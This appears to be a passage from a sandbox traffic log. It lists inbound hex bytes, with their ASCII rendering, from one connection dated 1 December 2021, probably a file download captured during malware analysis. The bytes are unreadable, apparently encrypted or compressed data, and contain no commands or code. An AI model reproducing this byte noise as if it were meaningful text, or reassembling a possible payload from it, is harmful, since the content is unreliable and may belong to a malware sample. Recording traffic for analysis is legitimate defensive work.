54 a3 33 d0 a0 52 f0 3a ce 94 3c 68 b4 2b 13 b6 79 a6 8b fc 57 f2 2b 62 4a 30 1c 28 bd a9 dd bb 91 8b e5 7e ab 1b 06 d2 e4 ab a3 97 b3 cc 69 58 49 48 d5 c2 65 9d 9b ec fc 83 ef 9a de 97 fd d9 Data Ascii: v W\|u d.-EkMBHu+;(Et5<7h%0zyDZNAcyV/@HnWAK0Rcik%[V{=Z+OBk;xD,ne-/,se?X%T3R:<h+yW+bJ0(~iXIHe
2021-12-01 12:26:35 UTC	184	IN	Data Raw: 78 1f e2 9f 50 05 4f 51 45 3e 72 ad 50 4b cc 91 95 b0 01 12 07 89 7e a5 18 24 c7 77 26 60 80 0b ff df 19 e4 34 c0 2f 4e a0 10 dd 81 1c 71 0b b6 f6 44 22 16 49 41 98 41 c7 63 54 2a 24 42 23 9e 45 d8 d7 f5 90 db 5c 02 cf 60 ec c8 75 e3 7c de 72 1b 2c 89 14 21 57 fa 99 48 9d 86 ac fe ea 88 85 62 94 3b f5 dc b4 c4 65 77 9f 73 9c e4 73 c9 0b 81 52 39 fa cd 3a 55 da b0 66 27 ce a3 c7 8f 25 ae f9 3c 45 d8 13 a4 44 c9 87 65 77 0b 66 68 5a 4a 0c e2 eb 18 b5 53 ab 27 f7 03 1b 03 74 b9 c2 86 6b e7 cf e4 57 93 63 54 c0 a3 16 86 ec fc 80 49 5a da 20 af 33 90 ba 12 1a e3 a8 87 e1 6a 22 b1 b7 5c 36 65 1c 03 c6 da d8 fa 7f 7e 15 10 64 59 fd f1 4e 69 72 c5 ce f3 ef 33 9b af b0 69 4b 69 ed bd ff 45 0c b3 da 1b 32 39 83 9b 34 aa 0a 7b 27 c3 0b ee 42 58 66 bc 73 0d 36 b2 29 Data Ascii: xPOQE>rPK~$w&`4/NqD"IAAcT*$B#E\`u\|r,!WHb;ewssR9:Uf'%<EDewfhZJS'tkWcTIZ 3j"\6e~dYNir3iKiE294{'BXfs6)
2021-12-01 12:26:35 UTC	186	IN	Data Raw: 32 2f f1 71 07 ae a3 51 e9 63 ff da fb b9 69 4a 0e f0 cf c0 bf e6 c0 d1 9a c3 bf ed 58 65 83 cd 91 8f 44 bd bc 11 61 1f f5 dd d9 99 5b f0 53 93 a0 5a 4f d4 d9 3b c5 a8 46 20 e0 07 02 51 b4 61 14 ad 86 bd fb 62 2f b1 1e 09 b8 b8 b0 4a 62 65 db 3f 3e 52 ea 40 5d f7 b1 da 7e b2 a8 93 29 a3 d1 00 a2 7d c1 dc 5a e9 d7 15 0c 2b 6e b6 7d 77 89 dc 51 14 bf 1f 66 89 a4 28 c0 a9 fb 6a 93 88 d7 98 3f 66 13 17 5c ab de 97 fb 1d 6b 12 4f ae 41 bf a5 65 23 ec 81 83 86 4b dc dc cf 3f 0e c4 db 78 ea ac 65 43 3e 80 77 03 57 97 51 02 c4 a3 2a 89 f6 5b 76 58 22 6f bc 76 21 22 25 53 fd 33 d7 89 5a 2d c9 72 0c 7f 16 cc 00 dc bd a8 df 0b cc ce 0f eb f7 39 cc df ae 8b d7 b6 fa 51 fa 5d d8 ba 2d 56 aa ba f8 5e 43 f0 4a 60 db 76 d5 c6 11 fb 2a 7e 0c 53 5c 64 60 be b6 d9 81 af f0 Data Ascii: 2/qQciJXeDa[SZO;F Qab/Jbe?>R@]~)}Z+n}wQf(j?f\kOAe#K?xeC>wWQ[vX"ov!"%S3Z-r9Q]-V^CJ`v~S\d`
2021-12-01 12:26:35 UTC	187	IN	Data Raw: 69 4f af 5c 2e 6d 09 87 08 9e 3a 8d eb 95 cb 0a 16 0f 41 1b 29 91 28 02 f1 de 27 0f a3 e9 3c 36 ca f2 db 69 80 e2 2d d7 cb 2e 6d 80 9f a7 48 23 a4 f0 9e 2a b5 47 49 55 25 36 95 35 b7 65 5f d1 fa 1c 3c 9e e5 4e 92 c0 e9 ca e9 04 61 0d b2 8f a5 21 d9 83 84 39 05 8b db 54 13 71 f8 28 7a 06 94 a1 5f ff f3 65 72 ce 3f e3 86 cb 43 0f 13 ad 59 70 7e 5d 9b 31 22 74 aa cd 63 89 ac 16 4d cd ff c4 11 23 b3 26 cd f3 6e f6 08 ae 98 1d 3d ae 40 10 26 58 92 df ee 09 bd aa 0d 9a 16 69 f6 bf 25 82 de e6 cb 28 c1 b1 b0 a9 fc 2c 62 3f 4d 02 e4 53 1f 95 bc ae c9 2b 20 a7 05 b3 70 d2 20 f5 5b a9 e1 65 0a c3 40 ee 9a 19 28 89 d8 c0 09 94 79 ef d5 5d c4 a6 95 59 31 ea ef f6 67 a5 1d f7 2b 16 86 29 27 c1 65 12 00 af 14 7d 64 3b 18 30 9c 7e b9 fe 80 9e 8a ed 84 34 42 44 d4 fc fb Data Ascii: iO\.m:A)('<6i-.mH#*GIU%65e_<Na!9Tq(z_er?CYp~]1"tcM#&n=@&Xi%(,b?MS+ p [e@(y]Y1g+)'e}d;0~4BD
2021-12-01 12:26:35 UTC	188	IN	Data Raw: 93 8b 52 5e 33 9f 9c 06 68 db 19 27 b7 b4 e1 8d f4 65 fb 6c 60 2b 3d c2 23 09 a9 43 f7 ad 82 dc 7d 13 3e 8b d5 e3 aa 13 ba b9 82 52 5b 49 7c 6d c3 4c 84 24 ce d1 8a 6f de a2 9a b4 d8 a5 b9 ac 58 fc af cc 43 a6 03 0c 7e 78 71 ef 76 44 8c 84 88 49 44 53 ca d3 8b 16 8f 06 5b 24 1f 27 24 9e 88 ab b8 be e5 28 9d e5 b2 ae a9 c7 ae 76 0b 4f 7b 46 24 10 dc 03 8f 33 0e 39 b4 7e 51 3e c2 69 79 bb b0 63 ce f1 f4 8b c1 98 69 6a e0 50 91 a0 19 c1 01 bd 96 ab 63 89 bc 38 5a 5e 53 a5 03 ab d3 61 f5 4a 03 ee ad b0 c5 8f b7 2d 94 c0 b6 ac 38 2b 6f f2 1d e9 b3 97 af cf 33 26 3e ac 17 69 72 19 1e 3e cb 09 21 de 33 71 c8 ab 3e 3d d0 89 97 e1 18 a6 ad 7a 40 21 52 38 33 51 79 0d d5 59 af c8 eb 63 37 69 e9 88 3b 4b 61 92 29 ec 6b 07 18 92 f9 5c 03 06 5f 96 53 b2 d4 2b 3a ed 25 Data Ascii: R^3h'el`+=#C}>R[I\|mL$oXC~xqvDIDS[$'$(vO{F$39~Q>iycijPc8Z^SaJ-8+o3&>ir>!3q>=z@!R83QyYc7i;Ka)k\_S+:%
2021-12-01 12:26:35 UTC	189	IN	Data Raw: b1 28 13 1c 09 5f d4 12 ff 94 7f 6e 40 31 6c 99 fd 56 48 4c 56 65 da a7 e9 34 dc e1 a6 58 4d e9 c8 83 ec 92 08 4c c0 3c 77 02 85 e0 04 75 0b 6e 20 14 1d 17 54 14 35 e9 60 fd 20 c5 2b c8 73 fe e0 64 a1 0a d8 e3 cc 31 be 37 4a 44 37 ff 08 84 26 96 85 36 e3 a4 70 e2 2a 4b 34 27 b0 e9 cc 3f bc 69 0d c4 51 1c b1 10 bc de 94 59 9f 8f 00 a3 15 6f 38 50 2f d5 95 84 a7 13 62 83 1f bf 9d 4b bb 28 b8 9e 45 bf fe ee cc 2d f7 1a 8e dc 5e 25 ee 36 46 64 06 f8 15 ab 88 50 b7 1a 65 d6 2f ea 57 fb 25 0c fc 11 16 a9 24 be 0c c4 54 df cf 4c 22 a9 b1 8c d8 66 bb 2f ac 0a 9d 49 74 7d 3a 26 7a e2 ef b3 10 b7 86 32 e8 9c ee 85 2d 6b 4e 19 58 54 49 f2 17 aa 30 bf 7e cc 10 b8 ed f2 f9 7c 74 44 76 4c ef 80 7b 64 30 94 8c 9d 38 17 7c f4 0e e8 96 c0 c6 b3 4f a4 1c b7 b9 4f 8b f2 7b Data Ascii: (_n@1lVHLVe4XML<wun T5` +sd17JD7&6p*K4'?iQYo8P/bK(E-^%6FdPe/W%$TL"f/It}:&z2-kNXTI0~\|tDvL{d08\|OO{
2021-12-01 12:26:35 UTC	191	IN	Data Raw: 5a 7f ca 33 0e 7f 38 4c 21 4f e2 7b d1 ed ce 91 08 0b d4 cc ce 6b a9 36 84 92 fa 78 fb a5 e8 91 2f 79 af 97 ed 3e 18 8b 4f e2 c1 5b f2 95 17 bd 04 c6 09 4d 04 ef 70 60 91 fe 81 df e4 e7 a2 02 e4 7b b3 ed 47 59 50 e2 03 77 81 5d 1e 79 db 34 01 63 4c e4 66 b6 bd 6a e3 bb b0 35 71 d4 57 4a 86 87 bb f8 34 a9 6d 13 f0 cc e0 4f bc c2 1e fe a4 84 83 29 e1 2a 6b dd 34 f9 7b 18 b0 ff 4d b8 ea b1 fe 13 6d fe a6 37 f6 76 0b 96 ef c1 a3 fd a2 5e 71 9f 12 7d bc 92 b4 b5 39 14 ac a3 3c 7b 5a fc f7 f5 c5 5e 5e 65 35 4c e8 d6 65 2c 05 80 50 dd e3 f9 47 23 46 60 44 4c 2b 2d 57 42 c8 86 85 1c 2f a8 04 25 50 f5 48 7a c6 f5 3c 80 86 b3 ca 17 13 1b 33 3c 7f 62 85 03 dd 2e 1f d3 21 cb dd 00 21 a8 0e 6d 99 78 c4 41 47 42 0b f8 20 f5 60 fc 81 93 91 73 72 04 cf c4 ec 11 47 bb 78 Data Ascii: Z38L!O{k6x/y>O[Mp`{GYPw]y4cLfj5qWJ4mO)*k4{Mm7v^q}9<{Z^^e5Le,PG#F`DL+-WB/%PHz<3<b.!!mxAGB `srGx
2021-12-01 12:26:35 UTC	192	IN	Data Raw: eb 0c 0b ce 50 f1 9b 90 29 0f cd a4 15 1d 78 87 fb 01 eb 27 94 19 10 9e c2 4e 66 79 16 58 28 81 87 3b 20 dc 4a fd 01 77 2b 54 4b 8c 19 f0 a3 2e 96 27 81 38 99 56 85 ed 43 a4 fb 79 f8 49 f8 5e ea 39 6d a7 4e 0b b8 09 e3 6f 9b 21 9e 16 c1 65 9b ae 85 f1 73 cc 3c bf 0b 85 9f 3f cc 53 57 88 0b 41 6b 38 c6 c5 fe 42 2b ef 2c 01 45 e8 db 39 6d 0f 93 9d a6 a8 0e 3b ed 98 a6 85 0e ff 53 f1 57 5d 48 ab ae ff 1c fc 68 c9 b3 91 95 a8 08 4b 39 1b ee d4 e2 53 41 b1 8b 79 b3 f5 71 a1 6b 52 80 2f 42 dd 48 8d 84 54 91 ce 0e 84 3c 56 ea 6e 32 3e f4 d2 05 30 a3 43 b4 24 ff da fa 04 69 da 25 16 cc ae bf 48 9d f3 9b d0 bf 66 58 21 87 00 93 b7 44 28 e0 38 61 5a f5 0b d8 51 6b 0b 51 8e a1 be 12 cb d9 5b c4 15 46 eb e5 61 01 07 b4 3c 4a 0f 87 96 fb b1 2f 74 2e c4 ba 80 b0 b0 3d Data Ascii: P)x'NfyX(; Jw+TK.'8VCyI^9mNo!es<?SWAk8B+,E9m;SW]HhK9SAyqkR/BHT<Vn2>0C$i%HfX!D(8aZQkQ[Fa<J/t.=
2021-12-01 12:26:35 UTC	193	IN	Data Raw: 03 bc d1 e4 3e 7f 2d f4 dd db 21 a4 cf 1e 97 01 1d 63 b4 ed 73 d3 79 14 29 7f 5c 87 cd aa a5 ea fd 81 33 72 f3 a6 1e 04 69 c1 26 c7 78 f5 0d 79 f3 72 26 f2 6d 7f 4a 9c f1 ed 32 9e 3f 3b 3f 38 92 ff 31 c2 12 5b a0 2a 7d e9 df 4f 59 22 57 78 89 42 ff 75 c0 4d 2c 2c 4d ef b2 50 4b 94 23 88 e2 07 f4 16 e8 bc d5 49 26 79 5c c8 de 80 ef 04 36 af b0 34 60 b8 61 6c 0d dd 17 e3 26 b0 79 f4 39 31 d3 2d 5d 98 41 93 f8 96 ef 22 a4 fb ea 87 35 86 f7 58 d8 9e 9a cf a0 54 0d b5 90 7e db 24 19 2f 89 16 b7 52 c5 9b ae 9d fb aa d9 bf 8a 87 62 93 ad fc 2e b7 22 68 0a 94 3b cc e6 67 c9 06 17 53 4c e8 2b 35 28 d8 da 22 25 c1 a3 c6 19 32 ca f4 da 45 a5 6e 2f 07 cb 85 65 09 9d 75 48 52 ac 71 9f f8 b5 e5 51 b5 26 e2 95 1a 98 69 5e d5 fb 69 29 bd e7 40 93 62 c2 e1 eb 0a 60 ec 81 Data Ascii: >-!csy)\3ri&xyr&mJ2?;?81[*}OY"WxBuM,,MPK#I&y\64`al&y91-]A"5XT~$/Rb."h;gSL+5("%2En/euHRqQ&i^i)@b`
2021-12-01 12:26:35 UTC	194	IN	Data Raw: a3 58 d7 8b 5a 18 c8 99 0d 98 14 15 01 dd e2 a8 df ae cd 35 0f 24 f1 79 cf cf ae 05 88 5b fb 3e fa ca d8 89 2d df a8 c5 f8 01 1d 83 4a 61 db 12 d4 f5 16 1f 28 fb 0d ef 03 67 60 47 b7 3c 81 58 f1 f9 84 ae e3 f3 a3 fa 61 cd 57 ce 26 4b 80 cb 19 b2 fd c7 04 3d 4e 1b 40 4d 94 fa e4 38 aa c1 58 5c 50 7a 95 3d be aa 36 2a 77 17 f6 a6 e2 3d ac f4 1c ea a7 13 af 8f ef 0e 6a 5a 21 10 7d 23 b1 d0 68 83 e8 82 ff 3f 48 c4 a4 9f f7 64 03 02 c5 f9 a4 08 bb a5 70 6d 11 44 af d9 9e ba 3c 0b a4 1f 38 8a 5f ab c5 6f c1 a5 5b 85 1b 20 ea 66 65 61 2a 0d 7b 32 e6 e3 62 97 4e 10 46 5b 23 d7 53 e4 cc 4a 95 81 03 5b 05 ad 7e 8d 50 54 c7 f5 3f 8e 99 8e d2 57 02 c9 34 2b 67 26 a0 61 dd 6f 1c 73 0a 03 f5 d3 23 25 19 25 9e 2f c1 bf 53 bb 25 c5 26 8c 42 8b 81 26 97 f1 54 a5 c5 e5 e6 Data Ascii: XZ5$y[>-Ja(g`G<XaW&K=N@M8X\Pz=6w=jZ!}#h?HdpmD<8_o[ fea{2bNF[#SJ[~PT?W4+g&aos#%%/S%&B&T
2021-12-01 12:26:35 UTC	195	IN	Data Raw: 57 be 10 ce a9 65 65 22 39 d2 eb f8 18 83 81 d2 63 66 0c 77 cf 39 8f 62 d5 ce 46 eb af 52 57 38 16 dc 4c d9 e6 d0 5e 76 54 d3 6a b1 4e 98 02 ce 2a 69 b4 a2 d3 04 f3 7c ea 7c e3 d9 6d e0 92 0a cb 38 f8 38 99 41 1f d7 7c 10 ea 40 82 42 ce 1b f0 b9 f2 34 9b e1 ea 88 3a c1 48 9f 39 98 cd 33 ad 44 1e 12 7f f2 59 13 92 ef b7 af 5f c7 1e 2d 0e 0e a2 14 0c 26 e6 7b f6 4a 67 0c 8d 23 a6 b2 67 9a 26 38 38 18 29 9c d7 3e 2e 37 31 ec 80 30 c1 14 5d 47 57 cc d8 f3 e2 1c 24 73 ef f3 dd ff 46 55 6b 2d ef 23 2c 6a 7e 5a 84 1a d7 38 0e a0 05 7e da c8 07 2d c2 ba 46 90 93 f0 99 55 cd e8 c8 02 28 a8 17 22 e0 8a f9 61 a4 e3 aa f4 88 4f 69 44 b3 2b c1 97 25 0c b4 5a 0f 6b c4 7d d9 16 04 43 18 80 d4 9c 24 d6 8b 5e a4 5a 0f c0 91 d0 36 2c e0 16 03 c1 f2 8c cd f4 67 f9 6e ac e9 Data Ascii: Wee"9cfw9bFRW8L^vTjN*i\|\|m88A\|@B4:H93DY_-&{Jg#g&88)>.710]GW$sFUk-#,j~Z8~-FU("aOiD+%Zk}C$^Z6,gn
2021-12-01 12:26:35 UTC	196	IN	Data Raw: 71 50 1d c1 1e da 85 36 4c 23 33 b6 88 e2 7c f9 d1 5a c2 a7 57 fa a9 ab 26 6a 1f 74 37 37 09 b1 b0 3d ab 88 a8 ff 5e 1d ed c2 4b f7 00 56 28 a1 2d a4 75 ee fd 30 70 15 1c f9 57 d8 a7 38 7f f2 21 7d 69 5b dd 93 2f 8a 44 5f d3 7e 16 b6 96 37 50 59 2c 0c d6 ab 81 62 82 1b 2c 27 34 23 cc 06 4b a8 51 95 a4 51 f4 63 a2 7e bc 1f 26 85 20 26 b5 d7 ef 8f 6e 1b dc 63 60 38 1b a0 57 8a 17 54 5b 0a 31 a3 39 40 83 18 20 cf 41 a3 a2 54 84 75 a4 47 b4 45 5c d1 f7 f5 99 0e dc 89 d7 89 41 33 e6 12 9c 59 5e 76 c3 43 fe 1e bf cb ed e9 bd ea 81 cb d2 ed 35 94 ee 9d 5c e2 22 2a 65 e9 5e 88 8f 1f ac 4e 6f 05 4c bf 73 38 6b 82 da 70 7d ce e6 9f 19 63 92 fb 9d 1f a5 5b 77 16 aa df 65 15 c5 66 2b 0b ac 6a c7 eb d0 bf 51 cd 7f f7 f2 43 98 34 06 c0 b8 32 29 d9 bf 57 d6 3a c2 86 b3 Data Ascii: qP6L#3\|ZW&jt77=^KV(-u0pW8!}i[/D_~7PY,b,'4#KQQc~& &nc`8WT[19@ ATuGE\A3Y^vC5\"*e^NoLs8kp}c[wef+jQC42)W:
2021-12-01 12:26:35 UTC	198	IN	Data Raw: 53 32 08 54 8c 04 77 a3 80 b8 a8 47 91 61 42 21 0e db 12 0c 2e f7 77 c8 4c 43 11 89 74 a6 b5 7c 80 22 25 38 25 3c 9c cb 3f 71 7a 07 e8 d6 30 d6 14 65 7e 4b dd 9d b4 8b 21 2f 5f e4 de d6 8b 33 08 1b 11 e5 18 0f 71 2c 0b 84 0f fe 61 40 f8 58 2e ea e9 57 61 ab c2 6b ba c0 af d0 04 ff bd 9e 5b 36 dd 4c 71 88 d3 db 3c fc bd cf ad d6 18 37 65 e3 2b da 81 10 0d 99 67 34 71 9c 28 b6 26 0e 16 07 8f d5 c1 66 90 ab 5e a0 3e 21 cb 91 be 75 5f d1 2a 2f df e7 cf 9a 80 4a f2 40 83 de a0 c2 24 4e 02 be 3f 4d a1 9e d9 2d 62 d6 f4 1b 9e 97 e3 48 d7 b4 d0 cd 3e 94 5f 2a c0 a5 0e 37 29 08 d3 7d a7 fb 93 3a bb d0 03 01 4c fa 79 a5 c7 9f b1 f6 f8 96 1f 5a 7e 13 9b 63 c0 b2 da 9e f8 18 39 2e 2d 43 83 c1 e3 2f 8f ef e4 e3 dd 9f e5 98 bd 69 d7 af 15 d4 c2 26 22 5d 7e 12 77 14 1f Data Ascii: S2TwGaB!.wLCt\|"%8%<?qz0e~K!/_3q,a@X.Wak[6Lq<7e+g4q(&f^>!u_/J@$N?M-bH>_7)}:LyZ~c9.-C/i&"]~w
2021-12-01 12:26:35 UTC	199	IN	Data Raw: be 6e e1 b8 57 86 6a 80 11 b8 26 4a 93 0e 56 93 80 ad a2 57 7f cd 5b 34 07 3c c5 10 ba 72 68 53 6b 26 95 4d 43 a6 4c 3a e8 24 c7 86 31 95 7d c5 57 82 31 5a f4 a3 e9 ab 39 94 88 c5 99 7a 0e ee 19 db 73 76 4f e2 71 c3 03 bc ee cb 9f 88 c9 ad e7 c9 ea 0c e0 c8 9b 5a e1 5b 17 6f 9f 7d a7 8a 16 9a 63 76 20 29 fd 68 57 45 aa bb 46 40 ce f3 b3 6b 71 a5 a8 ae 35 d0 70 5b 63 b9 e2 65 10 f8 12 17 1a c2 78 fe 99 dc 86 3f df 64 82 f9 6f ed 04 3a c0 9c 0e 5d c2 a5 22 e1 11 a7 ae 9e 5e 15 82 f5 f5 d4 6d d8 63 ce 43 72 cf a8 7d 05 eb 8a 91 16 18 d0 d6 28 5f 9c 72 3c b3 4f bf 87 31 2e 2b 77 2b 3b 97 02 2d ef 33 4c a0 e2 8a 03 bc c4 df 07 09 9e 9e 75 eb eb 7a ba aa 38 04 59 d1 fe 47 4c 65 09 57 40 09 d4 27 b9 67 db 00 7d 59 4a 5a 90 66 66 8e a2 d2 ad f1 85 b2 d3 ca 93 3e Data Ascii: nWj&JVW[4<rhSk&MCL:$1}W1Z9zsvOqZ[o}cv )hWEF@kq5p[cex?do:]"^mcCr}(_r<O1.+w+;-3Luz8YGLeW@'g}YJZff>
2021-12-01 12:26:35 UTC	200	IN	Data Raw: 2e f8 25 5e aa bd de 32 9d b1 fd c3 dc 1c 58 65 e1 2b f4 97 30 37 ab 63 04 78 f5 2d be 42 0c 71 51 bd d9 de 66 b3 b4 15 91 56 34 cb 84 85 69 42 d3 79 39 ca f2 e2 ab 95 4b d0 46 81 dd c5 fe 15 4b 2b ba 4b 5b 86 83 e8 3c 78 dd c0 7e bb a2 d7 11 e6 bf f5 cd 36 99 54 3f 94 90 0e 26 6c 00 d5 12 85 e0 92 30 f2 ee 1b 15 5d 9f 47 ee ed 89 9d e4 e2 8b 19 13 52 7e b7 65 c0 b0 f0 fb cd 19 37 24 0a 22 b1 c0 b1 49 bd f5 f1 ef b3 bb 97 a9 b6 4e d8 a8 19 83 9a 36 37 4c 7f 19 10 51 34 20 1c a5 f5 10 cf 97 2f 17 9d 56 fa e1 fe 44 5f 70 75 c7 42 b4 e8 2a de 8d 93 79 f8 47 c5 72 df 8c cd df 4f a3 2f 61 49 9e be aa f1 da 75 e1 da 9d 51 bd ae ac 29 5e d9 de a6 8c 95 4c 80 25 06 b2 8c b0 d7 62 6f 41 6d 6b 9c 40 09 0d ce d7 3d e4 09 85 71 ec b5 84 f2 f7 6e 33 cc 25 a5 48 d0 81 Data Ascii: .%^2Xe+07cx-BqQfV4iBy9KFK+K[<x~6T?&l0]GR~e7$"IN67LQ4 /VD_puB*yGrO/aIuQ)^L%boAmk@=qn3%H
2021-12-01 12:26:35 UTC	202	IN	Data Raw: 81 7f 7a 3e 4c 8e 4e 4c 77 89 bf 57 50 bc ca b3 60 75 b8 94 ae 28 c6 7c 43 16 b8 e2 11 28 d8 08 29 31 c0 6b cc 98 d9 e7 13 c6 27 b4 f8 1b dc 1b 5f 85 96 6b 6f f0 e6 10 fe 63 8a ad ea 5b 09 82 e4 d3 d2 7a bd 41 c2 33 61 df ae 47 47 cb 89 84 29 05 c1 d2 3d 5b f3 5b 1b a6 6e bf f4 0f 20 28 61 01 0a 89 15 2b fa 1d 23 88 eb 89 0c a9 d9 d5 3a 3f 8d 88 71 86 a3 69 ab ae 30 24 55 e7 d4 52 6f 7e 15 41 44 64 93 01 bf 4c ce 07 62 65 50 5b 90 07 48 e2 8a c4 bc a3 a4 aa d5 df 8f 39 30 54 24 6d 86 5f 1e df fa 8e a5 30 58 6e 6e 47 15 c2 4c db 19 df 95 5b 47 16 34 c5 f8 f5 29 e4 ad ea 55 42 28 76 8c 58 aa 2f f3 e8 61 fc be 06 14 6b 7b 9d 4a c2 87 c3 5a 45 02 be 01 b3 59 82 38 eb 6d 3e d9 ef c9 02 f5 4c d0 67 e0 c0 43 e1 9a 11 94 7e bf 28 9e 6d 19 81 23 10 df 40 97 79 dd Data Ascii: z>LNLwWP`u(\|C()1k'_koc[zA3aGG)=[[n (a+#:?qi0$URo~ADdLbeP[H90T$m_0XnnGL[G4)UB(vX/ak{JZEY8m>LgC~(m#@y
2021-12-01 12:26:35 UTC	203	IN	Data Raw: 8f fd b3 22 86 f2 04 34 48 94 4d a5 ec 83 9f f6 fb 91 17 52 75 13 97 70 ce ab fa 9e e5 1f 16 3c 24 2f 87 dd e4 18 9e f5 ea e9 b3 dc de 93 af 6d d5 b2 18 fa de 00 31 5f 62 1e 18 3f 34 2b 1c a1 f5 01 e2 99 35 76 9d 4d eb e3 f5 57 1a 5d 78 c7 41 a3 e0 35 d5 c9 b3 7f fe 61 dc 65 d8 96 ef a7 68 a9 28 7b 4c 9e b1 ce c5 cb 73 d7 f0 9f 22 99 b9 b1 09 58 d9 c7 a9 f8 83 79 86 15 24 be 93 b6 f6 7f 6d 5c 6a 63 f2 03 01 05 ca e9 1c f5 3b 85 76 f6 9f 86 81 c0 73 09 c8 23 a5 49 d9 81 ef 60 c0 89 5f 68 64 1c 6c 2e c7 fc ee 81 17 e9 51 37 56 24 0a f4 77 d2 b4 52 6e 0f 56 97 a8 96 56 c3 bf 1e d2 c9 64 c6 db 82 1d 6a 0b 55 45 16 32 d6 92 07 c6 9a 9c 8d 54 3b 82 c8 1e a5 10 6d 28 a0 1d d0 4d f8 89 00 4a 5e 3a d6 13 f3 86 56 3a c3 44 4f 60 08 f2 ac 49 b6 59 3a cd 5f 0d 9e b1 Data Ascii: "4HMRup<$/m1_b?4+5vMW]xA5aeh({Ls"Xy$m\jc;vs#I`_hdl.Q7V$wRnVVdjUE2T;m(MJ^:V:DO`IY:_
2021-12-01 12:26:35 UTC	204	IN	Data Raw: 07 2d ba 15 2b fa 04 46 be 8e bb 0f 8f c8 de 0c 39 96 8e 40 8a d1 6f a3 bf 1b 04 49 83 de 5a 5f 65 03 41 57 59 f2 30 ac 58 db 07 68 44 24 6c 9b 12 40 90 cd e3 a1 85 82 b4 ce cc 99 3f 17 45 24 08 a5 5b 70 f3 ed 9a 8c 2d 53 50 7b 41 04 c6 53 db 19 df 95 5b 48 29 38 c7 ec ec 4c f1 c8 cd 6f 67 0e 72 8c 7a a8 42 e4 f8 61 c6 9c 67 01 6f 62 c2 6c c1 f4 f2 52 36 09 bf 77 b1 4e f6 14 c7 6d 04 f0 81 c9 35 e4 60 f6 7f f3 c8 31 b7 a8 01 8c 49 94 24 9a 46 02 85 3c 74 ee 4c 86 51 fe 20 9e 99 ae 4a f4 c2 e0 af 73 c9 4e ac 6c ea 9f 15 a4 52 57 38 62 b3 6b 55 aa ef 91 b3 2b b7 5e 48 24 1f be 12 1f 25 f9 7b c5 5f 4b 0c 9f 7e d4 f6 4d 95 37 30 25 26 3a 81 c4 3b 7f 43 2d fe c1 5f e7 7b 5b 6b 4d e8 9c a8 88 2b 22 66 ce c8 c1 e4 02 61 38 16 e3 01 27 6a 0d 1c f6 38 e1 0d 69 f2 Data Ascii: -+F9@oIZ_eAWY0XhD$l@?E$[p-SP{AS[H)8LogrzBagoblR6wNm5`1I$F<tLQ JsNlRW8bkU+^H$%{_K~M70%&:;C-_{[kM+"fa8'j8i
2021-12-01 12:26:35 UTC	205	IN	Data Raw: 88 36 7c 25 b2 b0 a0 d6 cf 6e e6 c7 fa 12 95 a5 ae 1c 5e c3 c1 a8 96 83 1c a1 33 13 af 85 b8 aa 42 78 50 77 22 ce 66 01 15 d2 d7 3d c4 22 81 71 e0 a8 90 9b cc 6f 13 b8 30 a9 52 e8 c8 d2 7a df 88 5e 60 03 20 5e 2c dc f7 e2 88 76 da 5b 2b 44 24 11 fa 70 cf d1 45 4e 03 6c bd b3 81 53 d9 b5 7b de c9 55 c3 c6 8f 12 06 17 51 52 0d 3d c5 b8 07 c5 99 fd ac 44 3b 99 c3 73 d9 26 6c 44 ab 1d c7 66 d2 92 1c 55 15 2c ca 23 c3 bc 59 42 cd 4c 4e 52 1a ef b1 40 af 73 2b dd 78 30 8c bb 08 22 4f 2a 0c e0 8d b9 11 e3 1e 58 37 0b 4d c8 03 3b a0 6e e1 8e 77 80 6c 9b 10 a8 49 74 a2 10 43 8e cf 9f bf 50 74 f7 47 60 19 29 d4 4f 9a 65 73 79 7a 23 f4 5e 47 a0 47 00 f0 20 b5 86 54 a6 47 d0 62 8b 24 49 f5 f7 d7 be 28 dd a2 c1 8a 4b 32 f0 1f b4 44 7c 5e fa 14 e4 2e b6 ea cb f2 d5 f8 Data Ascii: 6\|%n^3BxPw"f="qo0Rz^` ^,v[+D$pENlS{UQR=D;s&lDfU,#YBLNR@s+x0"O*X7M;nwlItCPtG`)Oesyz#^GG TGb$I(K2D\|^.
2021-12-01 12:26:35 UTC	207	IN	Data Raw: 14 63 fe 5e a2 5b cb c9 70 c5 8f 12 0a 7e 16 d4 69 dc fe ce 54 17 03 a0 74 b8 48 f6 2a d1 7e 19 db 97 e8 02 f2 66 f5 67 85 de 26 c3 a4 31 8b 6f 8a 0c 8d 41 03 90 4e 47 dd 47 a0 4a f2 37 f0 b9 c1 55 f6 c1 f5 9e 1f c6 59 c2 7f 98 cc 2f bf 54 32 11 25 8c 0a 7d a7 e7 9b ac 4e 9a 58 2d 1d 06 b7 07 01 2f fe 7b c8 5f 0e 3f 99 65 c7 95 66 94 37 3f 23 76 0d 80 d8 37 6e 58 06 e1 d6 5e e1 7b 50 63 55 fc 81 a4 97 23 24 7c ff ba d4 ee 04 3e 3b 18 f2 0f 2c 6a 48 29 e1 23 c3 6c 7c f2 52 3f ea e9 57 61 ab d4 70 a1 d1 a5 da 15 ff 93 ab 6a 07 fb 75 79 a4 d3 cb 55 fa b6 ee 9c f3 14 3b 60 ea 6e fd 96 14 07 88 7d 15 1f 92 2e ad 1d 28 79 24 80 d4 ad 75 b3 ad 64 91 57 25 c5 a6 8e 75 42 c0 79 0d ca f2 fe 93 95 5d f7 40 9a d4 b1 b0 35 52 03 9a 5c 5d a1 9a f2 58 53 d6 c0 17 80 b7 Data Ascii: c^[p~iTtH*~fg&1oANGGJ7UY/T2%}NX-/{_?ef7?#v7nX^{PcU#$\|>;,jH)#l\|R?WapjuyU;`n}.(y$udW%uBy]@5R\]XS
2021-12-01 12:26:35 UTC	208	IN	Data Raw: f2 de 12 fd cc 8a 1a 19 2c 53 4e 34 39 c8 d1 0e d2 ea 9a 86 3d 1b 94 d5 6a 92 08 2d 7b a2 1b d1 60 d2 89 0b 08 56 2d d6 27 e8 9e 5f 48 c5 51 53 46 5b fd a0 5b 9d 53 2c c7 7e 0f 8b b3 18 50 6d 2c 0c cc 9a b2 01 96 39 45 2b 05 62 dc 23 2e a1 65 f9 b8 07 93 60 80 21 9a 2d 42 b5 12 55 85 c6 8e a6 50 77 e0 34 2d 0b 20 d4 79 ad 7b 65 0c 4b 3e 8d 39 60 b8 77 20 f3 02 a8 85 2d e1 71 dd 52 97 20 56 a8 a5 e5 b5 28 fd a2 c5 c3 7d 12 ec 15 ba 4c 70 56 e8 60 de 38 ab b0 e8 f0 89 c1 b8 cc fe e0 10 e7 83 b7 47 db 43 15 73 9f 5c ab 92 2c 9d 64 63 33 